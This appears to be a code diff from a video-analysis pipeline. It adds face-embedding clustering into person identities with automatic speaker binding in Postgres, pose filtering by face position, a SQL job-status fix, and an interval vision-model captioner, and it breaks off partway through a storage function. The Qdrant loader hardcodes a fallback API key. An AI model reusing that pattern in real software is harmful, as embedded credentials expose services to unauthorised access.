if not trace_embeddings:
print("❌ No valid traces found")
return
# Prepare embeddings for clustering
trace_ids = list(trace_embeddings.keys())
embeddings = np.array([trace_embeddings[tid]["embedding"] for tid in trace_ids])
# Cluster traces
print(f"[CLUSTER] Clustering {len(trace_ids)} traces...")
# Use Agglomerative with cosine distance
# Distance threshold 0.35 for tighter clustering
clustering = AgglomerativeClustering(
n_clusters=None,
distance_threshold=0.35, # Tighter threshold for traces
metric="cosine",
linkage="average"
)
labels = clustering.fit_predict(embeddings)
# Map trace_id -> person_id
unique_labels = set(labels)
label_to_person = {l: f"Person_{i}" for i, l in enumerate(unique_labels)}
print(f"[CLUSTER] Detected {len(unique_labels)} unique persons")
# Create trace -> person mapping
trace_to_person = {}
for i, trace_id in enumerate(trace_ids):
trace_to_person[trace_id] = label_to_person[labels[i]]
# Build frame-level output
output_frames = []
fps_value = face_data.get("fps", 23.98)
for frame_idx, frame_obj in enumerate(frames_list):
frame_num = frame_obj.get("frame", frame_idx)
timestamp = frame_obj.get("timestamp", frame_num / fps_value if fps_value > 0 else 0)
faces = frame_obj.get("faces", [])
output_faces = []
for face_idx, face in enumerate(faces):
# Find matching point from Qdrant
face_x = face.get("x", 0)
face_y = face.get("y", 0)
# Find trace_id for this face
matched_trace_id = None
for p in points:
payload = p.get("payload", {})
if payload.get("frame") == frame_num:
bbox = payload.get("bbox", {})
if abs(bbox.get("x", 0) - face_x) < 50 and abs(bbox.get("y", 0) - face_y) < 50:
matched_trace_id = payload.get("trace_id")
break
if matched_trace_id is not None and matched_trace_id in trace_to_person:
person_id = trace_to_person[matched_trace_id]
output_faces.append({
"face_id": f"face_{frame_idx}_{face_idx}",
"cluster_id": person_id,
"confidence": face.get("confidence", 0.9),
"trace_id": matched_trace_id
})
if output_faces:
output_frames.append({
"frame": frame_num,
"timestamp": timestamp,
"faces": output_faces
})
# Build cluster summary
clusters = []
for label in unique_labels:
person_id = label_to_person[label]
trace_count = sum(1 for l in labels if l == label)
face_count = sum(
trace_embeddings[trace_ids[i]]["face_count"]
for i, l in enumerate(labels) if l == label
)
clusters.append({
"cluster_id": person_id,
"trace_count": trace_count,
"face_count": face_count,
"representative_face": None
})
# Save output
output_data = {
"clusters": clusters,
"frames": output_frames
}
with open(OUTPUT_JSON_PATH, "w", encoding="utf-8") as f:
json.dump(output_data, f, indent=2, ensure_ascii=False)
print(f"[OUTPUT] Saved to {OUTPUT_JSON_PATH}")
print(f" - {len(clusters)} persons")
print(f" - {len(output_frames)} frames")
# Print cluster distribution
for c in sorted(clusters, key=lambda x: x["face_count"], reverse=True)[:5]:
print(f" - {c['cluster_id']}: {c['trace_count']} traces, {c['face_count']} faces")
if __name__ == "__main__":
main()
@@ -0,0 +1,563 @@
#!/opt/homebrew/bin/python3.11
"""
Face Clustering Processor — Multi-stage trace-based deduplication
Flow:
1. Load all face embeddings from Qdrant _faces collection
2. Aggregate by trace_id -> mean embedding + frame range per trace
3. Stage 1: AgglomerativeClustering on trace means (strict threshold 0.35)
4. Stage 2: Merge compatible clusters (temporal overlap guard, threshold_dist 0.25)
5. Assign person_id back to individual faces via trace_id
6. Output face_cluster.json with auto speaker binding
Output format (unchanged):
{"status", "file_uuid", "clusters": [{cluster_id, face_count, representative_face}], "frames": [{frame, timestamp, faces: [{face_id, cluster_id, confidence}]}]}
"""
import json
import numpy as np
import os
import sys
import argparse
import psycopg2
from collections import defaultdict
from sklearn.cluster import AgglomerativeClustering
sys.path.insert(0, os.path.dirname(os.path.abspath(__file__)))
from redis_publisher import RedisPublisher
UUID = os.getenv("UUID", "quick_preview")
OUTPUT_DIR = os.getenv("MOMENTRY_OUTPUT_DIR", "./output")
OUTPUT_JSON_PATH = os.path.join(OUTPUT_DIR, f"{UUID}.face_clustered.json")
ASRX_JSON_PATH = os.path.join(OUTPUT_DIR, f"{UUID}.asrx.json")
DB_URL = os.getenv("DATABASE_URL", "postgresql://accusys@localhost:5432/momentry")
STAGE1_THRESHOLD = 0.35
def write_empty_output(status: str, file_uuid: str, output_path: str):
output_data = {
"status": status,
"file_uuid": file_uuid,
"clusters": [],
"frames": []
}
with open(output_path, "w", encoding="utf-8") as f:
json.dump(output_data, f, indent=2, ensure_ascii=False)
print(f"Wrote empty output ({status}) to {output_path}")
def load_qdrant_faces(uuid: str, publisher: RedisPublisher) -> list:
"""Load all face points (payload + vector) from Qdrant _faces for a file."""
publisher.progress("face_cluster", 0, 100, "Loading embeddings from Qdrant")
try:
import requests
qdrant_url = os.environ.get("QDRANT_URL", "http://localhost:6333")
qdrant_api_key = os.environ.get("QDRANT_API_KEY", "Test3200Test3200Test3200")
headers = {}
if qdrant_api_key:
headers["api-key"] = qdrant_api_key
all_points = []
offset = None
while True:
body = {
"limit": 10000,
"with_payload": True,
"with_vector": True,
"filter": {
"must": [
{"key": "file_uuid", "match": {"value": uuid}}
]
}
}
if offset:
body["offset"] = offset
resp = requests.post(
f"{qdrant_url}/collections/_faces/points/scroll",
json=body,
headers=headers,
timeout=60
)
if resp.status_code != 200:
print(f"Qdrant scroll error: {resp.status_code}")
break
data = resp.json()
batch = data.get("result", {}).get("points", [])
all_points.extend(batch)
next_offset = data.get("result", {}).get("next_page_offset")
if not next_offset:
break
offset = next_offset
print(f"Loaded {len(all_points)} points from Qdrant _faces")
return all_points
except Exception as e:
print(f"Failed to load embeddings from Qdrant: {e}")
return []
def aggregate_by_trace(points: list) -> dict:
"""Group Qdrant points by trace_id.
Returns:
{trace_id: {'embeddings': ndarray, 'count': int, 'frame_min': int, 'frame_max': int}}
"""
traces = defaultdict(lambda: {"embeddings": [], "frame_min": float("inf"), "frame_max": -1, "face_refs": []})
for point in points:
payload = point.get("payload", {})
vector = point.get("vector")
if vector is None:
continue
trace_id = payload.get("trace_id", -1)
frame = payload.get("frame", 0)
t = traces[trace_id]
t["embeddings"].append(vector)
if frame < t["frame_min"]:
t["frame_min"] = frame
if frame > t["frame_max"]:
t["frame_max"] = frame
result = {}
for trace_id, t in traces.items():
emb = np.array(t["embeddings"])
result[trace_id] = {
"embeddings": emb,
"count": len(emb),
"frame_min": t["frame_min"],
"frame_max": t["frame_max"],
}
print(f" Aggregated {len(points)} faces into {len(result)} traces")
single_count = sum(1 for t in result.values() if t["count"] == 1)
print(f" Single-face traces: {single_count} ({single_count/len(result)*100:.0f}% of {len(result)})")
return result
def compute_trace_means(traces: dict) -> dict:
"""Normalize each trace's embeddings and compute mean vector.
Returns:
{trace_id: {'mean': ndarray(512,), 'frame_min': int, 'frame_max': int}}
"""
trace_data = {}
for trace_id, t in traces.items():
emb = t["embeddings"]
norms = np.linalg.norm(emb, axis=1, keepdims=True)
norms[norms == 0] = 1
emb_norm = emb / norms
mean_vec = np.mean(emb_norm, axis=0)
mean_vec = mean_vec / np.linalg.norm(mean_vec)
trace_data[trace_id] = {
"mean": mean_vec,
"count": t["count"],
"frame_min": t["frame_min"],
"frame_max": t["frame_max"],
}
return trace_data
def trace_level_clustering(trace_data: dict) -> dict:
"""Two-stage clustering on trace-level mean embeddings.
Stage 1: Strict AgglomerativeClustering (cosine, threshold=STAGE1_THRESHOLD)
Stage 2: Merge clusters whose centroids are within STAGE2_MERGE_DIST
and whose frame ranges do NOT overlap (temporal guard).
Returns:
{trace_id: person_label (int)}
"""
trace_ids = sorted(trace_data.keys())
n_traces = len(trace_ids)
if n_traces == 0:
return {}
if n_traces == 1:
return {trace_ids[0]: 0}
means = np.array([trace_data[t]["mean"] for t in trace_ids])
frames = [(trace_data[t]["frame_min"], trace_data[t]["frame_max"]) for t in trace_ids]
# Stage 1: strict AgglomerativeClustering on trace means
print(f" Stage 1: clustering {n_traces} traces (threshold={STAGE1_THRESHOLD})...")
clustering = AgglomerativeClustering(
n_clusters=None, distance_threshold=STAGE1_THRESHOLD,
metric="cosine", linkage="average"
)
stage1_labels = clustering.fit_predict(means)
n_stage1 = len(set(stage1_labels))
print(f" Stage 1 result: {n_stage1} clusters")
if n_stage1 <= 1:
# Nothing to merge
return {t: l for t, l in zip(trace_ids, stage1_labels)}
# Compute trace info per Stage 1 cluster
cluster_info = defaultdict(lambda: {"trace_ids": [], "means": [], "frame_min": float("inf"), "frame_max": -1})
for t, label in zip(trace_ids, stage1_labels):
ci = cluster_info[label]
ci["trace_ids"].append(t)
ci["means"].append(trace_data[t]["mean"])
if trace_data[t]["frame_min"] < ci["frame_min"]:
ci["frame_min"] = trace_data[t]["frame_min"]
if trace_data[t]["frame_max"] > ci["frame_max"]:
ci["frame_max"] = trace_data[t]["frame_max"]
cluster_labels = sorted(cluster_info.keys())
n_clusters = len(cluster_labels)
# Stage 2: trace-pair voting merge
# For each pair of clusters, count cross-trace high-similarity pairs.
# If enough traces match AND frame ranges don't overlap -> merge.
MATCH_SIM = 0.70
MATCH_RATIO = 0.30
merge_map = {cl: cl for cl in cluster_labels}
merged = set()
# Pre-compute normalized trace means for efficient dot-product
trace_mean_arr = np.array([trace_data[t]["mean"] for t in trace_ids])
trace_index = {t: i for i, t in enumerate(trace_ids)}
for i, cl_a in enumerate(cluster_labels):
if cl_a in merged:
continue
ci_a = cluster_info[cl_a]
ids_a = ci_a["trace_ids"]
for j, cl_b in enumerate(cluster_labels):
if j <= i:
continue
if cl_b in merged:
continue
ci_b = cluster_info[cl_b]
ids_b = ci_b["trace_ids"]
# Compute pairwise similarity between traces in A and B
idx_a = [trace_index[t] for t in ids_a]
idx_b = [trace_index[t] for t in ids_b]
sim_block = trace_mean_arr[idx_a] @ trace_mean_arr[idx_b].T # |A| x |B|
high_sim_pairs = np.sum(sim_block > MATCH_SIM)
min_size = min(len(ids_a), len(ids_b))
match_rate = high_sim_pairs / min_size if min_size > 0 else 0
if match_rate < MATCH_RATIO:
continue
# Temporal overlap check
r_a = (ci_a["frame_min"], ci_a["frame_max"])
r_b = (ci_b["frame_min"], ci_b["frame_max"])
overlap = max(0, min(r_a[1], r_b[1]) - max(r_a[0], r_b[0]))
if overlap > 0:
continue
merge_map[cl_b] = cl_a
merged.add(cl_b)
# Merge cluster info (for subsequent pair checks)
ci_a["trace_ids"].extend(ci_b["trace_ids"])
ci_a["means"].extend(ci_b["means"])
ci_a["frame_min"] = min(ci_a["frame_min"], ci_b["frame_min"])
ci_a["frame_max"] = max(ci_a["frame_max"], ci_b["frame_max"])
n_merged = n_clusters - len(merged)
print(f" Stage 2: merged {len(merged)} clusters -> {n_merged} final clusters")
# Build final label mapping: trace_id -> final cluster label
# Re-map to sequential Person_0..Person_N
final_cluster_ids = {}
next_label = 0
for cl in cluster_labels:
root = merge_map[cl]
if root not in final_cluster_ids:
final_cluster_ids[root] = next_label
next_label += 1
trace_to_person = {}
for t, label in zip(trace_ids, stage1_labels):
root = merge_map[label]
trace_to_person[t] = final_cluster_ids[root]
return trace_to_person
def main():
global OUTPUT_JSON_PATH, UUID
parser = argparse.ArgumentParser(description="Face Clustering Processor")
parser.add_argument("video_path", help="Path to video file")
parser.add_argument("output_path", help="Path to output JSON file")
parser.add_argument("--uuid", help="Video UUID (optional, overrides env var)")
parser.add_argument("--force", action="store_true", help="Overwrite existing output")
parser.add_argument("--frames", type=str, default=None, help=argparse.SUPPRESS)
args = parser.parse_args()
OUTPUT_JSON_PATH = args.output_path
output_dir = os.path.dirname(args.output_path)
if args.uuid:
uuid = args.uuid
else:
uuid = os.path.basename(args.video_path).rsplit(".", 1)[0]
UUID = uuid
face_json_path = os.path.join(output_dir, f"{uuid}.face.json")
if not os.path.exists(face_json_path):
face_json_path = os.path.join(output_dir, uuid, f"{uuid}.face.json")
publisher = RedisPublisher(uuid)
publisher.info("face_cluster", "Face clustering started")
if not os.path.exists(face_json_path):
print("Face JSON not found.")
write_empty_output("no_face_json", uuid, OUTPUT_JSON_PATH)
publisher.complete("face_cluster", "No face.json found")
return
with open(face_json_path) as f:
face_data = json.load(f)
frames_list = face_data.get("frames", [])
if not frames_list:
print("No frames in JSON (no faces).")
write_empty_output("no_faces", uuid, OUTPUT_JSON_PATH)
publisher.complete("face_cluster", "No faces to cluster")
return
fps_value = face_data.get("fps", 23.98)
# Step 1: Load all Qdrant _faces points
points = load_qdrant_faces(uuid, publisher)
if not points:
print("No embeddings found in Qdrant.")
write_empty_output("no_embeddings", uuid, OUTPUT_JSON_PATH)
publisher.complete("face_cluster", "No embeddings in Qdrant")
return
publisher.progress("face_cluster", 10, 100, f"Loaded {len(points)} Qdrant points")
# Step 2: Aggregate by trace_id
traces = aggregate_by_trace(points)
if not traces:
print("No valid traces found.")
write_empty_output("no_embeddings", uuid, OUTPUT_JSON_PATH)
publisher.complete("face_cluster", "No valid traces")
return
publisher.progress("face_cluster", 20, 100, f"Aggregated {len(traces)} traces")
# Step 3: Compute trace-level mean embeddings
trace_data = compute_trace_means(traces)
publisher.progress("face_cluster", 30, 100, "Computing trace means")
# Step 4: Two-stage trace-level clustering
trace_to_person = trace_level_clustering(trace_data)
if not trace_to_person:
print("Clustering produced no results.")
write_empty_output("no_embeddings", uuid, OUTPUT_JSON_PATH)
publisher.complete("face_cluster", "Clustering empty")
return
n_persons = len(set(trace_to_person.values()))
print(f"Clustering result: {n_persons} persons ({len(trace_to_person)} traces)")
# Step 5: Build trace_id -> face detection mapping from Qdrant payload
# For each face.json frame+face, find matching Qdrant point via trace_id
# Build a map: trace_id -> list of (frame_idx, face_idx) references
trace_to_face_refs = defaultdict(list)
qdrant_by_frame_trace = {}
for point in points:
payload = point.get("payload", {})
frame = payload.get("frame")
trace_id = payload.get("trace_id", -1)
bbox = payload.get("bbox", {})
if frame is not None and trace_id >= 0:
cx = bbox.get("x", 0) + bbox.get("width", 0) // 2
cy = bbox.get("y", 0) + bbox.get("height", 0) // 2
key = (frame, cx, cy)
qdrant_by_frame_trace[key] = trace_id
# Match face.json frames to trace_ids using (frame, bbox_center)
matched_count = 0
for frame_idx, frame_obj in enumerate(frames_list):
frame_num = frame_obj.get("frame", frame_idx)
for face_idx, face in enumerate(frame_obj.get("faces", [])):
x = face.get("x", 0)
y = face.get("y", 0)
w = face.get("width", 0)
h = face.get("height", 0)
cx = x + w // 2
cy = y + h // 2
key = (frame_num, cx, cy)
trace_id = qdrant_by_frame_trace.get(key)
if trace_id is None:
# Approximate match (within 50px)
for (qf, qx, qy), tid in qdrant_by_frame_trace.items():
if qf == frame_num and abs(qx - cx) < 50 and abs(qy - cy) < 50:
trace_id = tid
break
if trace_id is not None and trace_id in trace_to_person:
person_label = trace_to_person[trace_id]
face["person_id"] = f"Person_{person_label}"
matched_count += 1
print(f" Assigned person_id to {matched_count} faces")
if matched_count == 0:
print("No faces matched to any trace - check Qdrant data integrity")
publisher.progress("face_cluster", 100, 100, "No trace matches")
write_empty_output("no_faces", uuid, OUTPUT_JSON_PATH)
return
# Step 6: Build clusters list (same format as before)
# Count faces per person_label
person_face_count = defaultdict(int)
person_best_face = {}
for frame_idx, frame_obj in enumerate(frames_list):
for face_idx, face in enumerate(frame_obj.get("faces", [])):
person_id = face.get("person_id")
if not person_id:
continue
person_face_count[person_id] += 1
confidence = face.get("confidence", 0.9)
if person_id not in person_best_face or confidence > person_best_face[person_id]["confidence"]:
person_best_face[person_id] = {
"face_id": f"face_{frame_idx}_{face_idx}",
"confidence": confidence,
"frame": frame_obj.get("frame", frame_idx),
"bbox": {"x": face.get("x"), "y": face.get("y"), "width": face.get("width"), "height": face.get("height")}
}
person_labels_sorted = sorted(person_face_count.keys(), key=lambda p: -person_face_count[p])
clusters = []
for person_id in person_labels_sorted:
cluster_entry = {
"cluster_id": person_id,
"face_count": person_face_count[person_id],
"representative_face": person_best_face.get(person_id)
}
clusters.append(cluster_entry)
# Build output frames (same format)
output_frames = []
for frame_idx, frame_obj in enumerate(frames_list):
timestamp = frame_obj.get("timestamp",
frame_obj.get("frame", 0) / fps_value if fps_value > 0 else 0)
output_faces = []
for face_idx, face in enumerate(frame_obj.get("faces", [])):
person_id = face.get("person_id")
if person_id:
output_faces.append({
"face_id": f"face_{frame_idx}_{face_idx}",
"cluster_id": person_id,
"confidence": face.get("confidence", 0.9),
})
if output_faces:
output_frames.append({
"frame": frame_obj.get("frame", frame_idx),
"timestamp": timestamp,
"faces": output_faces,
})
# Save output
output_data = {
"status": "has_faces",
"file_uuid": UUID,
"clusters": clusters,
"frames": output_frames,
}
with open(OUTPUT_JSON_PATH, "w", encoding="utf-8") as f:
json.dump(output_data, f, indent=2, ensure_ascii=False)
print(f"Saved clustered data to {OUTPUT_JSON_PATH}")
publisher.complete("face_cluster", f"{len(clusters)} clusters")
# Step 7: Auto-bind speakers
auto_bind_speakers()
def auto_bind_speakers():
if not os.path.exists(OUTPUT_JSON_PATH) or not os.path.exists(ASRX_JSON_PATH):
print("Missing data for speaker binding.")
return
with open(OUTPUT_JSON_PATH) as f:
face_clustered = json.load(f)
with open(ASRX_JSON_PATH) as f:
asrx_data = json.load(f)
print("Auto-binding Speakers to Persons...")
face_spans = []
for frame_obj in face_clustered.get("frames", []):
ts = frame_obj.get("timestamp")
for face in frame_obj.get("faces", []):
person_id = face.get("cluster_id")
if person_id and ts is not None:
face_spans.append({"ts": ts, "person_id": person_id})
speaker_person_counts = {}
for seg in asrx_data.get("segments", []):
start = seg.get("start")
end = seg.get("end")
speaker = seg.get("speaker_id")
if not speaker or start is None or end is None:
continue
candidates = [f for f in face_spans if f.get("ts") is not None and start <= f["ts"] <= end]
if candidates:
person_counts = {}
for c in candidates:
pid = c["person_id"]
person_counts[pid] = person_counts.get(pid, 0) + 1
if speaker not in speaker_person_counts:
speaker_person_counts[speaker] = {}
best_person = max(person_counts, key=person_counts.get)
speaker_person_counts[speaker][best_person] = (
speaker_person_counts[speaker].get(best_person, 0) + 1
)
try:
conn = psycopg2.connect(DB_URL)
cur = conn.cursor()
for speaker, persons in speaker_person_counts.items():
if not persons:
continue
best_person = max(persons, key=persons.get)
print(f" {speaker} is likely {best_person} ({persons[best_person]} votes)")
cur.execute("SELECT id FROM talents WHERE real_name = %s", (best_person,))
row = cur.fetchone()
if row:
talent_id = row[0]
else:
cur.execute(
"INSERT INTO talents (real_name) VALUES (%s) RETURNING id",
(best_person,),
)
talent_id = cur.fetchone()[0]
print(f" Created Talent #{talent_id} ({best_person})")
cur.execute(
"""
INSERT INTO identity_bindings (talent_id, binding_type, binding_value, source, confidence)
VALUES (%s, 'speaker', %s, 'auto_cluster', 0.8)
ON CONFLICT (binding_type, binding_value) DO UPDATE SET talent_id = EXCLUDED.talent_id
""",
(talent_id, speaker),
)
print(f" Bound {speaker} -> {best_person}")
conn.commit()
cur.close()
conn.close()
except Exception as e:
print(f" DB Error: {e}")
if __name__ == "__main__":
main()
+128
View File
@@ -0,0 +1,128 @@
#!/opt/homebrew/bin/python3.11
"""
Filter pose.json - remove poses that don't match any face.
Usage: python3 filter_pose_by_face.py --uuid <uuid> --threshold <px>
"""
import json
import argparse
import os
def filter_pose_by_face(face_path, pose_path, output_path, threshold=100.0):
with open(face_path) as f:
face_data = json.load(f)
with open(pose_path) as f:
pose_data = json.load(f)
# Build frame -> faces lookup
face_by_frame = {}
for fr in face_data.get('frames', []):
fn = fr.get('frame')
if fn is not None:
face_by_frame[fn] = fr.get('faces', [])
filtered_frames = []
total_poses = 0
filtered_poses = 0
matched_poses = 0
for fr in pose_data.get('frames', []):
fn = fr.get('frame')
persons = fr.get('persons', [])
faces = face_by_frame.get(fn, [])
if not faces or not persons:
# No faces or no persons - keep frame only if it has persons
if persons:
filtered_frames.append(fr)
total_poses += len(persons)
filtered_poses += len(persons)
continue
filtered_persons = []
for person in persons:
total_poses += 1
bbox = person.get('bbox', {})
# Find nose keypoint
nose_kp = None
for kp in person.get('keypoints', []):
if 'nose' in kp.get('name', '').lower():
nose_kp = kp
break
if nose_kp is None:
# No nose keypoint - discard
filtered_poses += 1
continue
nose_x = nose_kp['x']
nose_y = nose_kp['y']
# Check distance to any face center
matched = False
for face in faces:
fcx = face['x'] + face['width'] / 2
fcy = face['y'] + face['height'] / 2
dist = abs(fcx - nose_x) + abs(fcy - nose_y)
if dist < threshold:
matched = True
break
if matched:
matched_poses += 1
filtered_persons.append(person)
else:
filtered_poses += 1
if filtered_persons:
filtered_frames.append({
'frame': fn,
'timestamp': fr.get('timestamp'),
'persons': filtered_persons
})
# Build output
output = {
'frame_count': pose_data.get('frame_count', 0),
'fps': pose_data.get('fps', 0),
'frames': filtered_frames,
'filter_stats': {
'total_poses': total_poses,
'filtered_poses': filtered_poses,
'matched_poses': matched_poses,
'threshold': threshold
}
}
os.makedirs(os.path.dirname(output_path), exist_ok=True)
with open(output_path, 'w') as f:
json.dump(output, f, indent=2)
print(f"Filter complete (threshold: {threshold}px)")
print(f" Total poses: {total_poses}")
print(f" Matched (kept): {matched_poses} ({matched_poses/max(1,total_poses)*100:.1f}%)")
print(f" Filtered out: {filtered_poses} ({filtered_poses/max(1,total_poses)*100:.1f}%)")
print(f" Output frames: {len(filtered_frames)}")
print(f" Saved to: {output_path}")
if __name__ == '__main__':
parser = argparse.ArgumentParser()
parser.add_argument('--uuid', required=True)
parser.add_argument('--threshold', type=float, default=100.0)
parser.add_argument('--output-dir', default=None)
args = parser.parse_args()
output_dir = args.output_dir or os.environ.get('MOMENTRY_OUTPUT_DIR', '/Users/accusys/momentry/output')
face_path = os.path.join(output_dir, f'{args.uuid}.face.json')
pose_path = os.path.join(output_dir, f'{args.uuid}.pose.json')
output_path = os.path.join(output_dir, f'{args.uuid}.pose_filtered.json')
if not os.path.exists(face_path):
print(f"Error: face.json not found: {face_path}")
exit(1)
if not os.path.exists(pose_path):
print(f"Error: pose.json not found: {pose_path}")
exit(1)
filter_pose_by_face(face_path, pose_path, output_path, args.threshold)
+189
View File
@@ -0,0 +1,189 @@
#!/opt/homebrew/bin/python3.11
"""
Filter Poses by Face Alignment
Removes pose detections where face keypoints (nose, left_eye, right_eye)
do not all fall within a corresponding face bbox.
Usage:
python3 scripts/filter_poses_by_face.py --file-uuid <uuid> [--output-dir /path/to/output]
Output:
{uuid}.pose.cleaned.json - Filtered pose data
{uuid}.pose.stats.json - Statistics (removed, kept)
"""
import argparse
import json
import sys
from pathlib import Path
def point_in_bbox(x: float, y: float, bbox: dict) -> bool:
"""Check if point is inside bbox."""
return (
bbox['x'] <= x <= bbox['x'] + bbox['width'] and
bbox['y'] <= y <= bbox['y'] + bbox['height']
)
def face_keypoints_in_bbox(keypoints: list, bbox: dict) -> bool:
"""Check if nose, left_eye, right_eye are all in bbox."""
required = {'nose', 'left_eye', 'right_eye'}
kp_dict = {kp['name']: kp for kp in keypoints if kp['name'] in required}
if len(kp_dict) < 3:
return False
for name in required:
kp = kp_dict[name]
if not point_in_bbox(kp['x'], kp['y'], bbox):
return False
return True
def filter_poses(face_data: dict, pose_data: dict) -> tuple:
"""
Filter poses based on face alignment.
Returns:
(cleaned_pose_data, stats)
"""
frames_map = {}
# Build frame -> faces mapping from face_traced.json
frames = face_data.get('frames', {})
if isinstance(frames, dict):
# Dict format: {"frame_num": {...}}
for frame_num, frame_data in frames.items():
faces = frame_data.get('faces', [])
bboxes = []
for f in faces:
if 'bbox' in f:
bboxes.append(f['bbox'])
else:
bboxes.append({'x': f.get('x', 0), 'y': f.get('y', 0),
'width': f.get('width', 0), 'height': f.get('height', 0)})
frames_map[int(frame_num)] = bboxes
elif isinstance(frames, list):
# List format
for frame_data in frames:
frame_num = frame_data.get('frame', frame_data.get('frame_number', 0))
faces = frame_data.get('faces', [])
bboxes = []
for f in faces:
if 'bbox' in f:
bboxes.append(f['bbox'])
else:
bboxes.append({'x': f.get('x', 0), 'y': f.get('y', 0),
'width': f.get('width', 0), 'height': f.get('height', 0)})
frames_map[frame_num] = bboxes
print(f"[pose_filter] Loaded {len(frames_map)} frames with face data")
# Filter poses
cleaned_frames = []
total_poses = 0
removed_poses = 0
for frame in pose_data.get('frames', []):
frame_num = frame.get('frame', frame.get('frame_number', 0))
face_bboxes = frames_map.get(frame_num, [])
kept_persons = []
for person in frame.get('persons', []):
total_poses += 1
keypoints = person.get('keypoints', [])
# Check if aligned with any face bbox
aligned = any(
face_keypoints_in_bbox(keypoints, bbox)
for bbox in face_bboxes
) if face_bboxes else False
if aligned:
kept_persons.append(person)
else:
removed_poses += 1
if kept_persons:
cleaned_frames.append({
**frame,
'persons': kept_persons,
})
cleaned = {
**pose_data,
'frames': cleaned_frames,
'frame_count': len(cleaned_frames),
}
stats = {
'total_poses': total_poses,
'kept_poses': total_poses - removed_poses,
'removed_poses': removed_poses,
'removal_rate': f"{removed_poses / total_poses * 100:.1f}%" if total_poses > 0 else "0%",
'frames_with_faces': len(frames_map),
'frames_kept': len(cleaned_frames),
}
return cleaned, stats
def main():
parser = argparse.ArgumentParser(description="Filter poses by face alignment")
parser.add_argument('--file-uuid', '-u', required=True, help="File UUID")
parser.add_argument('--output-dir', '-o', default='/Users/accusys/momentry/output', help="Output directory")
args = parser.parse_args()
output_path = Path(args.output_dir)
# Load face data
face_path = output_path / f"{args.file_uuid}.face_traced.json"
if not face_path.exists():
print(f"[pose_filter] Face file not found: {face_path}", file=sys.stderr)
sys.exit(1)
print(f"[pose_filter] Loading {face_path.name}...")
with open(face_path) as f:
face_data = json.load(f)
# Load pose data
pose_path = output_path / f"{args.file_uuid}.pose.json"
if not pose_path.exists():
print(f"[pose_filter] Pose file not found: {pose_path}", file=sys.stderr)
sys.exit(1)
print(f"[pose_filter] Loading {pose_path.name}...")
with open(pose_path) as f:
pose_data = json.load(f)
print(f"[pose_filter] Pose frames: {len(pose_data.get('frames', []))}")
# Filter
print(f"[pose_filter] Filtering poses...")
cleaned, stats = filter_poses(face_data, pose_data)
# Save cleaned pose
cleaned_path = output_path / f"{args.file_uuid}.pose.cleaned.json"
with open(cleaned_path, 'w') as f:
json.dump(cleaned, f)
print(f"[pose_filter] Saved: {cleaned_path}")
# Save stats
stats_path = output_path / f"{args.file_uuid}.pose.stats.json"
with open(stats_path, 'w') as f:
json.dump(stats, f, indent=2)
print(f"[pose_filter] Stats: {stats_path}")
# Print summary
print(f"\n[pose_filter] === SUMMARY ===")
print(f" Total poses: {stats['total_poses']}")
print(f" Kept poses: {stats['kept_poses']}")
print(f" Removed poses: {stats['removed_poses']} ({stats['removal_rate']})")
print(f" Frames kept: {stats['frames_kept']}")
if __name__ == "__main__":
main()
+22
View File
@@ -0,0 +1,22 @@
-- Fix stale_processing files: status='processing' but job_id IS NULL
-- These files should be reset to 'pending' so they can be processed properly
-- Show current state
SELECT file_uuid, file_name, status, job_id
FROM videos
WHERE status = 'processing' AND job_id IS NULL;
-- Fix: Reset to pending
UPDATE videos
SET status = 'pending', processing_status = NULL
WHERE status = 'processing' AND job_id IS NULL;
-- Verify fix
SELECT file_uuid, file_name, status, job_id
FROM videos
WHERE file_uuid IN (
'5e207a246fd6a2a65ee0a267440465ee',
'9cbeb112fcc5452e869755a539478061',
'bfba056f5021e2404b0870cc0b1fa851',
'2d0ec3a72d5dda98b10b3eb777650846'
);
+1
View File
@@ -86,6 +86,7 @@ if __name__ == "__main__":
parser.add_argument("output_path")
parser.add_argument("--uuid", "-u", default="")
parser.add_argument("--sample-interval", type=int, default=3)
parser.add_argument("--frames", type=str, default=None, help=argparse.SUPPRESS)
args = parser.parse_args()
publisher = RedisPublisher(args.uuid) if args.uuid else None
+303
View File
@@ -0,0 +1,303 @@
#!/opt/homebrew/bin/python3.11
"""
Interval VLM Caption - Analyze video at regular intervals (10s default)
Extracts frames on-the-fly with ffmpeg (no pre-storage) and analyzes with VLM.
Runs in background, non-blocking.
Usage:
python interval_vlm_caption.py --file-uuid abc123 --video /path/to/video.mp4
python interval_vlm_caption.py --file-uuid abc123 --video /path/to/video.mp4 --interval 10
Output:
{output_dir}/{uuid}_interval_profile.json
"""
import argparse
import base64
import json
import os
import subprocess
import sys
import tempfile
import time
from pathlib import Path
try:
import requests
except ImportError:
print("requests not installed: pip install requests", file=sys.stderr)
sys.exit(1)
def get_video_duration(video_path: str) -> float:
"""Get video duration in seconds using ffprobe."""
cmd = [
"ffprobe", "-v", "quiet",
"-show_entries", "format=duration",
"-of", "json",
video_path
]
result = subprocess.run(cmd, capture_output=True, text=True)
if result.returncode != 0:
return 0.0
data = json.loads(result.stdout)
return float(data["format"]["duration"])
def extract_frame_at_time(video_path: str, timestamp_sec: float, output_path: str) -> bool:
"""Extract a single frame at specific timestamp."""
cmd = [
"ffmpeg", "-y", "-v", "quiet",
"-ss", str(timestamp_sec),
"-i", video_path,
"-vframes", "1",
"-q:v", "2",
output_path
]
result = subprocess.run(cmd, capture_output=True)
return result.returncode == 0
def call_vlm(image_path: str, prompt: str, model: str = "llava:7b", ollama_url: str = "http://localhost:11434") -> str:
"""Call Ollama VLM API."""
with open(image_path, "rb") as f:
image_b64 = base64.b64encode(f.read()).decode("utf-8")
payload = {
"model": model,
"prompt": prompt,
"images": [image_b64],
"stream": False,
"options": {"num_predict": 100}
}
try:
resp = requests.post(f"{ollama_url}/api/generate", json=payload, timeout=30)
resp.raise_for_status()
data = resp.json()
return data.get("response", "").strip()
except Exception as e:
print(f"[vlm] API error: {e}", file=sys.stderr)
return ""
def get_embedding(text: str, model: str = "nomic-embed-text-v2-moe", ollama_url: str = "http://localhost:11434") -> list:
"""Get embedding from Ollama."""
try:
resp = requests.post(
f"{ollama_url}/api/embed",
json={"model": model, "input": text},
timeout=30,
)
resp.raise_for_status()
data = resp.json()
return data.get("embeddings", [[]])[0]
except Exception as e:
print(f"[vlm] Embedding error: {e}", file=sys.stderr)
return []
def store_to_qdrant(analysis: dict, file_uuid: str, interval_index: int, timestamp_sec: float, qdrant_url: str = "http://localhost:6333", qdrant_api_key: str = None) -> bool:
"""Store VLM results to Qdrant _vlm collection."""
description = analysis.get("vlm_description", "")
if not description:
return False
